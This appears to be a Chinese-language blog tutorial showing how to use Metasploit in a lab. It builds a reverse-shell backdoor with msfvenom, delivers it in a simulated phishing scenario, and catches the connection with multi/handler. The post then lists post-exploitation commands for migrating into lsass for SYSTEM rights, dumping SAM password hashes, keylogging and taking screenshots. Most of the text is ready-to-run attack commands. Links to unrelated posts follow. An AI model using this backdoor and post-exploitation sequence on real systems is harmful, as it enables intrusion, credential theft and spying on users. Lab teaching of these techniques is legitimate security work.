昨天介绍了 Meterpreter 的指令列表,今天带大家来实作。
我们测试的方法在攻击主机产 msfvenom 的後门,因为目标主机为 Windows 因此指令为:
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=攻击主机IP LPORT=攻击主机监听port -f exe -o ~/test.exe
并透过 Python3 构造一个简单的 webserver,模拟情境为员工收到钓鱼信件之後,下载恶意附件,并开启该恶意档案,由下图可看到下载 test.exe。
透过 msfconsole 开启 exploit/mult/handler,
msfconsole
:开启 CLI 介面use exploit/multi/handler
使用监听模组set payload windows/shell/reverse_tcp
:设定跟 msfvenom 所使用的 payload 一样set LHOST 172.28.128.6
:设定攻击主机IPset LPORT 4444
:设定攻击主机 portexploit
:进行攻击如上图看到C:\User\vagrant\Desktop
表示成功进入主机,此时输入 background
,将这次的连线移到背景执行。
可从指令sessions
查看目前正在背景执行的连线。
使用 session -u <id>
将指定的连线提升使用 Meterpreter,就可以使用 Meterpreter 的指令,透过 sessions
可以看到目前背景有两个连线状态。
透过 session -i <id>
可以进入指定的连线,进行操作。
系统资讯
sysinfo
可以提供目标主机的资讯,如作业系统、登入使用者帐号、主机名称。
取得使用者名称
getuid
要确认目前进入的使用者帐号,我们的目标取的最高使用者的权限。
查看目标硬碟与其他设备
show_mount
可以看到目标主机连接的硬碟大小与其他如 CD/DVD 等资料,由下图可看到挂载的C:\
查看目前空闲的时间
idletime
可以看到目前使用者处於非活动状态的总时间。
shell
进入指令模式,有时候没有办法执行 shell,因此要透别注意。
确认 process
ps
指定移动到特定的 process
migrate <id>
切换成管理员权限
找到 SYSTEM ,id 484 lsass.exe
使用管理者的权限,因此可以切换到这个 process。
migrate 484
切换权限,并且使用 hashdump
hashdump
可以取得 Windows SAM 资料库的内容,需要管理者的权限。
搜寻密码相关档案
测试 keyloagger
pgrep notepag
keyscan_start
keyscan_dump
keyscan_stop
截图
screenshot
>>: DAY 27:Chain of Responsibility,将实作透过串串乐串起来
今天来处理登入的流程。 送出登入的方式很简单,使用WebSocketClient的send方法即可:...
承接上篇,抓日成交资讯时,我们得知道股票代码,那如果我想要有一个可以定时更新的股票代码清单,要去哪里...
API Application Programming Interface的缩写,主要在I,一个接口...
前言 在这个 GAN 到爆炸的年代,你能想到的东西我都可以拿出一个有 GAN 的 Paper 出来X...
简单来说 Docker 就是一个虚拟机,确保执行专案时的环境都一样。 毕竟影响程序执行成功或失败的变...